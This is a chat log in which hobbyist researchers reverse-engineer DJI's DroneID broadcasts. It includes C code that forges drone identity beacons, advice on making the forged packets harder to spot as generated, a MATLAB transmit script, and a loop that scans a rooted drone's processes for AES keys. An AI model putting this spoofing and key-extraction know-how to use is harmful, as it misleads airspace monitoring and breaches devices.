    droneinfo->app_gps_latitude = (int32_t) (ds->home_latitude * deg2raw);
    droneinfo->app_gps_longitude = (int32_t) (ds->home_longitude * deg2raw);
    droneinfo->product_type = 70;
    droneinfo->uuid_len = 16;
    rand_buf_wcharset((char *) &droneinfo->uuid, 16, "ABCDEFGH0123456789", true);
}
[2022-04-22 20:35:39]
hostile :
hah just remembered spoofing droneID in France is illegal. https://twitter.com/d0tslash/status/983682341460697089?s=20&t=ZSqteNgf8A5OoiHZ4Bwftw
[2022-04-22 20:36:38]
hostile :
re: privacy concerns too , ya all remember this? https://www.youtube.com/watch?v=FqMkIsUmPcI
[2022-04-22 20:39:10]
wavesahead :
{"seqNum": 18, "status": "1110101111110000", "droneID": "4CG8DCA8GB734", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.3, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "D9H58B5F"}
{"seqNum": 18, "status": "1110101111110000", "droneID": "68HD5H97E3709", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 71.0, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "C67G5H1D"}
{"seqNum": 18, "status": "1110101111110000", "droneID": "85044312E368B", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.6, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "A7420EE2"}
{"seqNum": 18, "status": "1110101111110000", "droneID": "244C8AC18B14A", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.5, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "G9009GFB"}
{"seqNum": 18, "status": "1110101111110000", "droneID": "BD7BHC69G9D60", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.9, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "ACBBHAC3"}
{"seqNum": 18, "status": "1110101111110000", "droneID": "4FGH357ED33B4", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 71.0, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "2691C82H"}
[2022-04-22 20:39:17]
wavesahead :
but wireshark:
[2022-04-22 20:40:30]
wavesahead :
[2022-04-22 20:41:45]
hostile :
increment that sequence number and looks good!
[2022-04-22 20:43:13]
wavesahead :
which one?
[2022-04-22 20:43:38]
hostile :
seqNum": 18,
[2022-04-22 20:43:41]
hostile :
on all of em
[2022-04-22 20:43:44]
wavesahead :
uint8_t *craft_droneid_packet(drone_state_t * ds, size_t *pktLen)
{
    size_t pktlen = 0;
    uint8_t *pkt = NULL;
    if (ds->droneinfo_ver == 1) {
        struct enhancedwifi_droneid_v1 *droneid_frame_v1 = NULL;
        pktlen = sizeof(struct enhancedwifi_droneid_v1);
        droneid_frame_v1 = malloc(pktlen);
        if (droneid_frame_v1 == NULL) {
            ESP_LOGE(TAG, "failed to allocate %zu bytes for droneinfo v1 packet",
                     pktlen);
            return NULL;
        }
        memset(droneid_frame_v1, 0, pktlen);
        dji_init_droneinfo_v1(droneid_frame_v1, ds);
        droneid_frame_v1->seq = ds->current_seq;   // caller bumps current_seq after each send
        pkt = (uint8_t *) droneid_frame_v1;
    } else {
        struct enhancedwifi_droneid_v2 *droneid_frame_v2 = NULL;
        pktlen = sizeof(struct enhancedwifi_droneid_v2);
        droneid_frame_v2 = malloc(pktlen);
        if (droneid_frame_v2 == NULL) {
            ESP_LOGE(TAG, "failed to allocate %zu bytes for droneinfo v2 packet",
                     pktlen);
            return NULL;
        }
        dji_init_droneinfo_v2(droneid_frame_v2, ds);   // zeroes the struct itself
        droneid_frame_v2->seq = ds->current_seq;
        pkt = (uint8_t *) droneid_frame_v2;
    }
    *pktLen = pktlen;
    return pkt;
}
[2022-04-22 20:43:48]
wavesahead :
it is done automatically
[2022-04-22 20:43:59]
wavesahead :
droneinfo_pkt = craft_droneid_packet(&cfg->drones[i], &droneinfo_pktlen);
if (droneinfo_pkt == NULL)
continue;
cfg->drones[i].current_seq++;
if (cfg->drones[i].current_seq > 0xfff)
cfg->drones[i].current_seq = 0;
[2022-04-22 20:44:11]
hostile :
maybe start each one on random sequence
[2022-04-22 20:44:18]
hostile :
instead of all at same one?
[2022-04-22 20:44:20]
wavesahead :
no no
[2022-04-22 20:44:55]
hostile :
[2022-04-22 20:45:02]
hostile :
see all droneID and UUID are rando.
[2022-04-22 20:45:08]
hostile :
but every one is all seqnum 18
[2022-04-22 20:45:11]
hostile :
sticks out like sore thumb
[2022-04-22 20:54:13]
wavesahead :
actually thats weird
[2022-04-22 20:54:15]
wavesahead :
hold on
[2022-04-22 20:55:46]
wavesahead :
@hostile pay attention
[2022-04-22 20:55:49]
wavesahead :
they are different stations
[2022-04-22 20:56:07]
wavesahead :
of course their sequence numbers are the same, although i can offset them
[2022-04-22 20:56:33]
hostile :
I know they are different stations.
[2022-04-22 20:56:42]
wavesahead :
two different stations started at the same time will obviously have the same seq, but yes, we can touch that up
[2022-04-22 20:56:43]
wavesahead :
hold on
[2022-04-22 20:56:45]
hostile :
I'm saying they stick out as *generated* since all stations are in sequence
[2022-04-22 20:57:28]
hostile :
rando that product type field too? (or make configurable eventually)
[2022-04-22 21:01:12]
wavesahead :
im not setting it because something is off with the encoding
[2022-04-22 21:01:26]
wavesahead :
kismet is acting up, isn't the web ui default now?
[2022-04-22 21:27:59]
wavesahead :
too sleep deprived now
[2022-04-22 21:28:23]
hostile :
yes compile kismet from source
[2022-04-22 21:28:29]
hostile :
don't use from apt or package
[2022-04-22 21:35:45]
wavesahead :
got git
[2022-04-22 21:35:49]
wavesahead :
working
[2022-04-22 21:35:53]
wavesahead :
i think kismet only sees v1
[2022-04-22 21:44:37]
dragorn :
well like I said before: Find me a v1 and a v2 packet
[2022-04-22 21:44:40]
dragorn :
because I sure cant' find one
[2022-04-22 21:44:53]
dragorn :
even old caps that are supposed to be v1 have a v2 in the version field and weird lengths
[2022-04-22 21:45:05]
dragorn :
I've yet to see a 100% "this is a v1" and "this is a v2"
[2022-04-22 21:45:19]
dragorn :
kismet git can absolutely parse the new format in that v2 python script
[2022-04-22 21:45:36]
dragorn :
the problem is every packet i've seen identifies as v2, even when it isn't, and they're all exactly the same length ie tag
[2022-04-22 21:45:39]
dragorn :
which shouldn't be possible
[2022-04-22 21:45:57]
dragorn :
so either the data i have is bunk, or dji has absolute garbage firmware. The latter has been 100% true in the past.
[2022-04-22 21:47:42]
dragorn :
i've been given some pcaps which are supposed to be v2 with v2 content. kismet handles them fine (again, git only)
[2022-04-22 21:47:56]
dragorn :
but are they really v2? are the "v1" pcaps really v1? no clue..
[2022-04-22 21:48:10]
dragorn :
I have no drones currently (or any plans to buy them) so that's where things stand for now
[2022-04-22 21:50:58]
dragorn :
(i realize I sound pissed off - i'm not, just a little exasperated with shitty firmware and having no ability to attack any of it directly myself for now)
[2022-04-22 21:54:25]
hostile :
and TBH we've said some things 30 times in a row. Chat history MUST be used. We're all moving rapidly, but must pay attention
[2022-04-22 22:00:00]
dragorn :
hey i'm probably guilty of not following too
[2022-04-22 22:00:03]
dragorn :
to be fair
[2022-04-22 22:00:11]
dragorn :
it's been a busy few weeks here
[2022-04-22 22:18:39]
hostile :
dirty rapid prototyping
[2022-04-22 22:37:15]
wavesahead :
briefly here
[2022-04-22 22:37:43]
wavesahead :
@dragorn ill provide you with sanitized pcaps and finally write that tool to sanitize them
[2022-04-22 22:38:04]
wavesahead :
v1 and v2 are different, absolutely. im in the same boat as you re no drones from dji and no interest in buying one
[2022-04-22 22:38:11]
wavesahead :
at least not now
[2022-04-22 22:39:05]
wavesahead :
i tried my detection with a nightly and my esp32 prototype, obviously could use some debugging for that component
[2022-04-23 02:32:11]
proto :
the rf drone id bursts contain 174 bytes of demodulated data, only ~ 91 bytes of which are used for what we call drone id. the rest are seemingly always constant between power ons. anyone have a clue as to what that data is? is it just random garbage from the drone that's padding the burst out? there doesn't seem to be any real pattern to the data. most of the data is just zeros anyway. something like 28-31 bytes of non-zero data in total
[2022-04-23 03:25:19]
hostile :
crypto key info for the Occusync AES stream?
[2022-04-23 03:56:23]
hotelzululima :
(waiting with bated breath)
[2022-04-23 03:59:04]
proto :
would be funny, but i'd be surprised if it were something like that. how long is the key supposed to be?
[2022-04-23 03:59:23]
proto :
is there any way to test that thought?
[2022-04-23 04:40:24]
hostile :
```
All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties.
```
[2022-04-23 04:40:28]
hostile :
https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations
[2022-04-23 04:43:59]
hostile :
https://dji-rev.com/dji-rev/pl/8tej7awowfff3kcewis7hjbfpe
[2022-04-23 04:46:55]
hostile :
https://dji-rev.com/dji-rev/pl/bkjc6r5a9tbfiqak5wtnm1585y
[2022-04-23 04:46:58]
hostile :
https://dji-rev.com/dji-rev/pl/9nkb6yapt3gbtnq7e7ztifsy6c
[2022-04-23 04:47:22]
hostile :
@validat0r you still here? You say Occusync uses a PSK?
[2022-04-23 04:50:27]
proto :
oof, that's out of my league O.O
[2022-04-23 04:50:53]
hostile :
maybe. Shoot for the moon, you may hit that fucker
[2022-04-23 04:50:58]
proto :
just got done pushing up a MATLAB script that is supposed to generate arbitrary drone id frames. unfortunately it's not quite right for some reason
[2022-04-23 04:51:23]
proto :
amplitudes of the ofdm symbols are fucky
[2022-04-23 04:52:24]
proto :
if anyone wants to dork around: https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m
[2022-04-23 04:53:37]
proto :
had to hate fuck a crc algo into matlab. it did not go willingly
[2022-04-23 05:07:03]
hostile :
Look everyone thinks AES PSK
[2022-04-23 05:10:54]
hostile :
https://www.precisionhawk.com/hubfs/Retest_DJI%20Cybersecurity%20Risk%20Assessment%20Final%20Report_03.31.2020%20Executive%20Summary%20(1).pdf
[2022-04-23 05:11:46]
hostile :
Hey pretty sure I couldn't talk about that before. I love it when shit becomes public info.
[2022-04-23 05:12:13]
proto :
all the DES
[2022-04-23 05:17:52]
atlantic :
173 bytes + 3 bytes LTE CRC24. The data beyond the DJI CRC16 is garbage because they do not zeroize the buffer. There are two messages: flight record and flight purpose. Flight purpose is longer, so you will see that data (crc etc).
[2022-04-23 05:19:11]
hostile :
lol so they just leaking chunks of memory in the packet?
[2022-04-23 05:20:14]
proto :
would be an interesting attack vector O.o
[2022-04-23 05:20:45]
hostile :
would be hilarious if they leaked parts of the key like that
[2022-04-23 05:21:45]
atlantic :
just garbage of the other message
[2022-04-23 05:22:28]
hostile :
assumed as much. but it made me think of heartbleed none the less.
[2022-04-23 05:22:33]
atlantic :
no random parts of memory
[2022-04-23 05:26:45]
atlantic :
in the dji go 4 app, you can fill in a uuid and flight purpose. type something there, maximum characters, and have a look at your drone id.
[2022-04-23 05:27:28]
proto :
oooo, good idea
[2022-04-23 05:27:31]
proto :
thanks!
[2022-04-23 05:27:56]
proto :
i'll give that a go after some sleep. currently slamming my head against ofdm modulation issues
[2022-04-23 05:28:22]
proto :
i've managed to make something so simple infinitely more difficult
[2022-04-23 05:30:30]
proto :
i'm calling it a night. fingers crossed for successful tx'ing tomorrow :)
[2022-04-23 06:14:25]
superlogical :
superlogical joined the channel.
[2022-04-23 07:32:25]
tmbinc :
@proto the remaining bytes is literally the memory content of the SDR :) they don't clear it
[2022-04-23 07:32:36]
tmbinc :
ah, atlantic already commented
[2022-04-23 13:56:48]
ostap :
ostap joined the channel.
[2022-04-23 14:03:29]
wavesahead :
so
[2022-04-23 14:04:04]
wavesahead :
if someone 1) gets me a loaned drone jailbroken 2) allows me vpn access into a net where i can connect into the drone, i can probs look around for the keying data
[2022-04-23 14:04:18]
wavesahead :
it should be trivial to detect aes key expansion blocks and extract them from memory
[2022-04-23 14:04:41]
wavesahead :
re prng: fuck that, we need to know what they are using for rng
[2022-04-23 14:05:15]
wavesahead :
@atlantic hilarious
[2022-04-23 14:05:31]
wavesahead :
might still be useful for an exploit if it contains heap ptrs
[2022-04-23 14:07:35]
wavesahead :
time to use pinned messages you fucks
[2022-04-23 14:07:51]
wavesahead :
nobody has time to doom scroll
[2022-04-23 14:08:50]
wavesahead :
a note on AES: what key exchange method is being used?
[2022-04-23 15:26:20]
the_lord :
is rooted mini 2 good for you?
[2022-04-23 15:27:14]
wavesahead :
that could work, what fw is it running?
[2022-04-23 15:27:25]
wavesahead :
mini 2 is enhancedwifi?
[2022-04-23 15:27:35]
the_lord :
no its ocusync 2
[2022-04-23 15:27:40]
wavesahead :
sweet then
[2022-04-23 15:30:02]
the_lord :
re FW , I think its latest version, I don't remember I need to check
[2022-04-23 15:30:11]
wavesahead :
sweet ^ 2
[2022-04-23 16:07:33]
bobboynton :
bobboynton joined the channel.
[2022-04-23 17:42:08]
wavesahead :
@atlantic around?
[2022-04-23 19:35:10]
wavesahead :
This is a modified script that will cloak your coordinates, like so: 'XX.X1975390ZZZZZZ'
[2022-04-23 19:35:34]
wavesahead :
argh
[2022-04-23 19:38:51]
wavesahead :
Correct script. This will cloak the coordinate fields like so:
802.11 SSID: b'' BSSID 38:d2:62:b2XXXX CHANNEL: 149
{
"seqNum": 141,
"status": "1100100010111000",
"droneID": "THIS IS PRINTED AS IS, NO CLOAKING! (edited to keep someone's drone data off)",
"longitude": "XX.X",
"latitude": "XX.X",
"absoluteHeight": 0,
"altitude": 0.0,
"north": 0.0,
"east": 0.0,
"down": 0.0,
"yaw": 545.12,
"appGPSTime": 1648702488.681,
"appGPSLatitude": "XX.X1975390ZZZZZZ",
"appGPSLongitude": "XX.X07680628ZZZZZZ",
"homeLongitude": "XX.X",
"homeLatitude": "XX.X",
"productType": "Mini SE",
"uuid": ""
}
[2022-04-23 19:39:34]
wavesahead :
so, if you send the dump over PM ill get the real drone id/sn, but nothing else. also the bssid. none of this is really sensitive.
[2022-04-23 20:11:40]
hostile :
we need a scapy script to import and export a good cap with someone's real coords, obfuscated to a new location
[2022-04-23 20:12:12]
hostile :
takes pcap, filters only ivs... and spits out anonymized location with real drone detail re: roll pitch yaw, etc from their flight path
[2022-04-23 20:12:39]
hostile :
or a way to *localize* pcaps to a specific region's lat / lon and include the same real flight path
[2022-04-23 20:16:21]
wavesahead :
yeah i can do that in a few
[2022-04-23 20:16:24]
wavesahead :
btw
[2022-04-23 20:16:53]
wavesahead :
/ # ./tmp/aes-finder
Usage: aes-finder -pid | process-name
/ # uname -a
Linux AmbaLink 4.9.76 #1 SMP PREEMPT Mon Nov 30 21:27:09 CST 2020 armv7l GNU/Linux
/ #
[2022-04-23 20:17:04]
wavesahead :
inside rooted drone
[2022-04-23 20:17:08]
wavesahead :
cross compiled aes-finder
[2022-04-23 20:17:17]
wavesahead :
reports nothing, about to test with RC connected
[2022-04-23 20:17:25]
wavesahead :
this is thanks to the generosity of someone here
[2022-04-23 20:28:37]
wavesahead :
/tmp # for i in `ps auxw | awk '{ print $1 }'`; do ./aes-finder $i; done
/tmp # for i in `ps auxw | awk '{ print $1 }'`; do ./aes-finder $i; done | less
[2022-04-23 20:28:52]
wavesahead :
im suspecting this is due to whitebox crypto AND/OR the aes-finder process dumping is shit
[2022-04-23 21:10:22]
jan2642 :
I’m not at all up-to-date with the current drones but in mavic air e.g. they moved the crypto to a TrustZone applet. In that case aes-finder won’t find the keys in the different processes' memory because they themselves don’t have access to it.
[2022-04-23 21:26:38]
wavesahead :
yep
[2022-04-23 21:51:51]
superlogical :
Hi!
Trying to get the matlab code going with my recordings but always fails finding the bursts.... anyone got a hint?
[2022-04-23 21:55:53]
proto :
hmm, your window doesn't appear to have enough data in it. one sec
[2022-04-23 21:58:00]
proto :
i think that you have a correlation peak that is within `search_window` (`100` samples) of the beginning of the file
[2022-04-23 21:58:55]
proto :
which likely means you caught the middle of the droneid burst at the very beginning of your collect. this is def a bug that i don't check to make sure that there are enough samples to complete the search
[2022-04-23 22:01:52]
hostile :
lemme know if I need to send more bottles of expensive champagne @Proto you've been outdoing yourself constantly.
[2022-04-23 22:05:26]
proto :
@superlogical replace starting at line 70 with the following:
```
% Look through each element of the `passing_scores` vector (which is just indices where the correlation threshold was
% met) and pick just the highest value `search_window` elements around (`search_window/2` to the left and right) of each
% value. The goal here is to only end up with the best score for the starting point of each burst instead of having
% multiple starting points for each burst.
true_peaks = [];
search_window = 100;
for idx = 1:length(passing_scores)
    % Calculate how far to the left and right to look for the highest peak
    left_idx = passing_scores(idx) - (search_window / 2);
    right_idx = left_idx + search_window - 1;
    % MATLAB/Octave indices start at 1, so a window starting below 1 or running past the end cannot be searched
    if (left_idx < 1 || right_idx > length(abs_scores))
        warning("Had to abandon searching for burst '%d' as it was too close to the end/beginning of the window", idx);
        continue
    end
    % Get the correlation scores for the samples around the current point
    window = abs_scores(left_idx:right_idx);
    % Find the peak in the window and use that value as the actual peak
    [value, index] = max(window);
    % `index` is relative to the start of the window, so subtract one to map it back into `abs_scores`
    true_peaks = [true_peaks, left_idx + index - 1];
end
```
[2022-04-23 22:05:40]
proto :
that *might* fix the issue
[2022-04-23 22:06:13]
proto :
i pushed that code up as well
[2022-04-23 22:08:57]
superlogical :
currently executing - will report results, but then have to go to sleep.
[2022-04-23 22:08:59]
superlogical :
Thx
[2022-04-23 22:12:45]
dragorn :
Did someone say "android exploit"? https://thehackernews.com/2022/04/critical-chipset-bug-opens-millions-of.html :)
[2022-04-23 22:26:31]
proto :
pppoooopppp
[2022-04-23 22:26:34]
proto :
will check
[2022-04-23 23:03:51]
wavesahead :
|Manufacturer | DJI|
|--- | ---|
|Model | Mini SE|
|Serial Number | 4AES2700598170|
|ID Method | DroneID|
|Home Location | 0, 0|
|App Location | 0, 0|
|Telemetry | |
|Motor | 1|
|Airborne | 0|
|Last Location | 0, 0|
|Altitude | 708|
|Height | 6|
[2022-04-23 23:03:56]
wavesahead :
im curious about the state info @dragorn
[2022-04-23 23:05:02]
wavesahead :
```
local_state_info = setStateBit(local_state_info, 0x01); // set serial valid
local_state_info = setStateBit(local_state_info, 0x02); // set user privacy enabled
local_state_info = setStateBit(local_state_info, 0x04); // homepoint set
local_state_info = setStateBit(local_state_info, 0x08); // uuid set
local_state_info = setStateBit(local_state_info, 0x10); // motor on
```
... etc
[2022-04-23 23:05:16]
wavesahead :
so, im curious as to why that isn't coming up
[2022-04-24 02:23:52]
ashen :
ashen joined the channel.
[2022-04-24 04:48:07]
oakley75 :
For instance, Snowden de-solders his mic and uses an external, but this shows how nothing is really enough.
[2022-04-24 08:15:17]
atlantic :
no ?
[2022-04-24 08:25:17]
atlantic :
what is the working principle of aes-finder? how does it know it is a key and not some random bits?
[2022-04-24 08:31:49]
wavesahead :
heuristics that apply to aes keys
[2022-04-24 08:32:09]
wavesahead :
the expansion blocks have long been known to be excellent for accurate memory search
[2022-04-24 08:32:15]
wavesahead :
goes all the way back to coldboot and co
[2022-04-24 19:53:50]
proto :
i'm in need of some dsp assistance. when i receive signals sent by the drone i can just create a ZC sequence, take the conjugate of it, and use the values as taps to a fir or fft filter. what i get out is normally a nice normalized 0-1.0 score that works perfectly for plucking the signal out. but, when i look at signals from others the correlation results are all over the place. i was making a blind assumption that the ZC had some kind of special property that made this just magically work. i suspect that was a mistake and i have to normalize on my own which is crazy expensive computationally (i can prob do some tricks to get it much faster with a day or so of work) which isn't as nice as just 'filter this please'. so, is there anything to the ZC being special or am i going to have to do this the hard way?
[2022-04-24 19:55:14]
proto :
this is the code i use for generating the seq:
```
% Would use MATLAB's zadoffChuSeq function, but Octave doesn't have that
% The logic below was tested against the MATLAB function
zc = reshape(exp(-1j * pi * root * (0:600) .* (1:601) / 601), [], 1);
% Remove the middle value (this would be DC in the FFT)
zc(301) = [];
% Create a buffer to hold the freq domain carriers
samples_freq = zeros(fft_size, 1);
% Get which FFT bins should be used for data carriers
data_carrier_indices = get_data_carrier_indices(fft_size * 15e3);
% Assign just the data carrier bins (left to right) the ZC sequence values
samples_freq(data_carrier_indices) = zc;
% Convert to time domain making sure to flip the spectrum left to right first
samples = ifft(fftshift(samples_freq));
```
[2022-04-24 20:25:47]
atlantic :
what do you mean by all over the place?
[2022-04-24 20:26:28]
atlantic :
uplink also uses ZC u=600, so you also get hits on that one.
[2022-04-24 20:27:53]
atlantic :
if you have cfo, all u other than 600 and 1 will give multiple peaks, so you have to correct cfo first.
[2022-04-24 20:39:38]
proto :
oh, i mean that the results of filtering (fir or fft) with the conjugate of the zc sequence does give me one very sharp peak, but the amplitude of that peak is not normalized to between 0 and 1.0 (0-100% match). normalized correlation results are really nice for streaming demod since i don't have to figure out what the correlation min value should be based on some random value that might change environment to environment or between sdrs. i have a function that will return a score between 0 and 1.0 (see below) but it's rather expensive as is due to recalculating the mean and variance *every single sample offset*
```
%% Computes the normalized cross correlation of two vectors
% Used https://www.researchgate.net/post/How-can-one-calculate-normalized-cross-correlation-between-two-arrays
% as the reference for this implementation
function [score] = normalized_xcorr(window_one, window_two)
assert(length(window_one) == length(window_two), "Windows must be equal length");
assert(isrow(window_one) || iscolumn(window_one), "Windows must be row/column vectors");
assert(isrow(window_two) || iscolumn(window_two), "Windows must be row/column vectors");
% Make both windows zero mean
window_one = window_one - mean(window_one);
window_two = window_two - mean(window_two);
% Cross correlate and get the average
xcorr_value = sum(window_one .* conj(window_two)) / length(window_one);
% Final step in normalization
score = xcorr_value / sqrt(var(window_one) * var(window_two));
end
```
[2022-04-24 20:40:18]
proto :
and i purposefully did not reverse the zc sequence before loading into the filter coefficients since it's symmetric
[2022-04-24 20:56:21]
wavesahead :
too tired today to help
[2022-04-25 14:02:14]
pinejuice :
pinejuice joined the channel.
[2022-04-25 17:20:06]
stanlee :
https://dronexl.co/2022/04/25/dji-helps-the-russians-ukraine-government/
[2022-04-25 17:43:34]
hostile :
For posterity... https://dji-rev.com/dji-rev/pl/ckxpma7pib8kzkbeqk1588impa
[2022-04-25 17:58:07]
atlantic :
this blog owner has no new news, no references, he is just making a new article recycling old "news" with a lot of keywords to generate traffic on his blog.
[2022-04-25 19:56:56]
wavesahead :
@hostile they are actively barring them from using aeroscope in some cases and refusing to help them in deactivating droneid
[2022-04-25 19:57:06]
wavesahead :
there is no 'tampering' about those facts
[2022-04-25 19:57:37]
wavesahead :
maybe when you got your information that was the case
[2022-04-25 19:57:43]
wavesahead :
but most definitely that is not the situation now
[2022-04-25 20:39:27]
hostile :
@wavesahead I'm aware of the speculation... some of these are not "facts"
[2022-04-25 20:40:15]
hostile :
1) DJI does not support disable of droneID for anyone period. Please show otherwise. For example a Russian successfully asking DJI to disable it, or providing firmware with it disabled. This is simply NOT factually authenticated information period.
[2022-04-25 20:40:55]
hostile :
"actively barring them from using aeroscope in some cases" show me ONE case... I'll sit and wait. And we can talk to the person whose Aeroscope it is, and I'll rope in Adam Lisberg personally to discuss IF DJI supported them in their request for assistance.
[2022-04-25 20:42:06]
hostile :
2) "maybe when you got your information that was the case" since I have got my information, no one has provided a validated, verifiable account of this claim. Period. Feel free to do so yourself. ANYONE here can claim to be in contact with so and so, whose mom is the Ukrainian what ever. NO ONE has provided verified proof. Period.
[2022-04-25 20:42:54]
hostile :
anyone is welcome to make statements. Just like I have always done, I will continue to push folks to prove their statements, and not expect anyone to take them at face value.
[2022-04-25 20:44:06]
hostile :
Simple example. My penis is 13 inches long, and the Ukrainian defense minister personally verified that it is so large it requires it's own no fly zone. This is a fact, simply because I said it. No one can prove otherwise.
[2022-04-25 20:45:53]
hostile :
I welcome ANYONE to refute this claim below in Adam / my tweet exchange, and I'll personally reach out to Adam and we will get the unit troubleshot together.
[2022-04-25 20:45:58]
hostile :
https://twitter.com/adamlisberg/status/1501994676018200583
[2022-04-25 20:47:36]
hostile :
Also please be aware that some of the initial source was a disgruntled DJI dealer claiming to be "blackmailed" by DJI over some hardware order support. https://www.facebook.com/story.php?story_fbid=5293125594071761&id=100001231196056
[2022-04-25 20:49:21]
hostile :
https://www.facebook.com/taras.troiak/posts/5305016822882638
[2022-04-25 20:50:46]
hostile :
so again... anyone here that knows folks on the ground making the claim that DJI is refusing to help them with an Aeroscope unit that is broken. Reach out to me personally, and we will talk to Adam about it and put it to rest. Else stop repeating unverified information please.
[2022-04-25 20:51:36]
hostile :
if you do wanna repeat it... provide some forensic evidence that DJI is preventing access, as opposed to a dumb operator that didn't update an SSL cert, OR a network that was compromised by Russians (altering the SSL)
[2022-04-25 20:52:08]
hostile :
per:
[2022-04-25 20:52:23]
hostile :
''Dear Aeroscope owner: The certificate and key files for the Aeroscope unit #aeroscopeID# will be expired in one week. Please update them in time. Please contact with your DJI sales manager or DJI dealer to handle this update. DJI will issue the new certificate file and key file if the annual maintain fee is paid. Public cloud server will automatically upload these issued files. After that you could update those to the unit remotely. Please send your question to aeroscope.support@dji.com if you have any for this certificate update. Thanks Aeroscope product team"
[2022-04-25 20:55:11]
hostile :
so you leave your shit up... power goes out cuz of mortar... on reboot you get:
```
'Dear Aeroscope owner: The certificate and key files for the Aeroscope unit #aeroscopeID# are expired so it cannot connect to the server now. Please contact with your DJI sales manager or DJI dealer to handle this problem. DJI will issue the new certificate file and key file if the annual maintain fee is paid. Public cloud server will automatically upload these issued files. After that you could update those to the unit remotely. Please send your question to aeroscope.support@dji.com if you have any for this certificate update. Thanks Aeroscope product team'
```
[2022-04-25 20:56:57]
hostile :
But as I said. I'll sit here with open arms, awaiting one of you to bring me a verified AeroScope user in Ukraine right now, that is unable to use their gear, because they claim DJI shut it down cuz Russians asked them to. Adam is easy for me to reach. We'll sort it quickly!
[2022-04-25 21:07:00]
hostile :
caveat: Keep in mind there have been rumored remotely exploitable vulnerabilities in Aeroscope, including the AMS (non mobile version) that could impact availability, and this has NOTHING to do with DJI itself, short of piss poor programming practices. (default passwords for DB's, and RF reachable vulnerabilities)
[2022-04-25 21:07:18]
hostile :
I'd LOVE to see a disabled Mobile unit. I challenge anyone to find one.
[2022-04-25 21:08:00]
hostile :
Find me an AMS unit that is currently unable to connect to the DJI cloud (or its own private cloud instance) and I'll give you a cookie. Then we can let the real fun begin with regard to pushing for "help" fixing it.
[2022-04-26 02:28:39]
leo :
leo joined the channel.
[2022-04-26 11:29:26]
pangjammy :
pangjammy joined the channel.
[2022-04-26 14:14:15]
hostile :
Did anyone here with an AeroScope get a chance to test @proto's latest work? https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m ?
[2022-04-26 19:16:57]
konraditurbe :
Spoofing the phone GPS to troll remoteID packets: https://twitter.com/74ck_0/status/1518618306445520896
[2022-04-26 19:23:57]
wavesahead :
if folks here have pcaps for the normal wifi and also enhancedwifi drones, I do NOT need the droneinfo side of the beacon
[2022-04-26 19:24:06]
wavesahead :
i do want the wifi frame only
[2022-04-26 19:24:15]
wavesahead :
feel free to PM me the pcaps as attachments
[2022-04-26 19:24:48]
wavesahead :
i can also write a small tool to filter out the droneinfo data with a placeholder and
[2022-04-26 19:24:54]
wavesahead :
remove anything personal
[2022-04-26 19:25:33]
jan2642 :
I've upgraded my M2 to V01.00.0770 to check if it would add the all-zero symbol. Nope, it's still not there:
[2022-04-26 19:27:08]
jan2642 :
As suggested by @atlantic, this was recorded with a much lower gain. This results in much cleaner QPSK dots:
[2022-04-26 19:33:34]
atlantic :
perfect constellation.
[2022-04-26 19:34:10]
wavesahead :
nice
[2022-04-26 19:37:24]
hostile :
https://www.dji.com/mobile/newsroom/news/dji-statement-on-sales-compliance-efforts
[2022-04-26 19:37:30]
hostile :
Top kek
[2022-04-26 19:38:42]
jan2642 :
The data still contains lots of zeros. Maybe because the thing wasn't flying (no props) but it had GPS and the motors were running. I hoped to have seen the 'purpose' in the payload but that's still not the case. In wifi this info is sent alternately in the beacons: a beacon with metrics and then a beacon with the info. Is that also the case with ocusync ? I haven't found a single one which had the purpose encoded in it.
[2022-04-26 19:52:49]
atlantic :
https://www.dji.com/mobile/newsroom/news/dji-statement-on-sales-compliance-efforts
[2022-04-26 19:53:44]
atlantic :
yes, once every five or so.
[2022-04-26 21:37:15]
faineg :
and i'll definitely write a story about it if it happens, lol
[2022-04-26 22:43:49]
proto :
good to know! I'm curious if we can put together a map of which drones actually use the all zeros symbol
[2022-04-26 22:59:56]
wavesahead :
the guy on twitter that posted some droneinfo v2 packet, with the crc
[2022-04-26 23:00:01]
wavesahead :
is he here?
[2022-04-26 23:23:20]
proto :
assuming for a moment that my frame generation and modulation code actually works, does anyone have a plan on how to generate "valid" flight paths? even just creating elevation, lat, and lon values would probably suffice right?
[2022-04-26 23:25:04]
proto :
what program is that? really nice to have the grid to denote symbols
[2022-04-26 23:27:28]
proto :
can a hackrf tx at 15.36 million samples per second? or will it be limited to even numbers like 15 Msps?
